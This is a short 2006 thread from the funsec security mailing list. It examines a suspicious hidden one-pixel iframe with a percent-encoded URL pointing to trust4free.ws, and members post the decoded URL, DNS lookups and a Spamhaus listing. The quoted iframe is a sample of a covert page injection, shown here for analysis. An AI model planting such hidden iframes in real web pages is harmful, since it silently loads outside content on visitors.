[funsec] Naughty thing ...

RLVaughn Randy_Vaughn at baylor.edu
Tue Jan 17 19:23:39 CST 2006


Richard Cox wrote:
> On Wed, 18 Jan 2006 00:24:29 +0000 (GMT)
> Drsolly <drsollyp at drsolly.com> wrote:
> 
>> <iframe src= 
>> http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 
>> frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
> 
> That decodes to : <iframe src= http://www.trust4free.ws?id=index12
> frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
> 
> If that's malware, there are specific lists for reporting that ...
> 
> Dig www.trust4free.ws at ns4.everydns.net (63.219.183.200) ...
> Authoritative Answer
>  Query for www.trust4free.ws type=255 class=1
>   www.trust4free.ws A (Address) 207.150.165.180
>   trust4free.ws NS (Nameserver) ns1.everydns.net
>   trust4free.ws NS (Nameserver) ns2.everydns.net
>   trust4free.ws NS (Nameserver) ns3.everydns.net
>   trust4free.ws NS (Nameserver) ns4.everydns.net
>   ns1.everydns.net A (Address) 64.158.219.3
>   ns2.everydns.net A (Address) 216.218.240.206
>   ns3.everydns.net A (Address) 80.84.249.169
>   ns4.everydns.net A (Address) 63.219.183.200
> 
> Paging EVERYDNS to the WHITE COURTESY PHONE ...
> 
> http://www.spamhaus.org/sbl/sbl.lasso?query=SBL37017
> _______________________________________________
> Fun and Misc security discussion for OT posts.
> https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
> Note: funsec is a public and open mailing list.
I've followed this one through and see nothing other
than a web site in Japanese with a link to duke.



More information about the funsec mailing list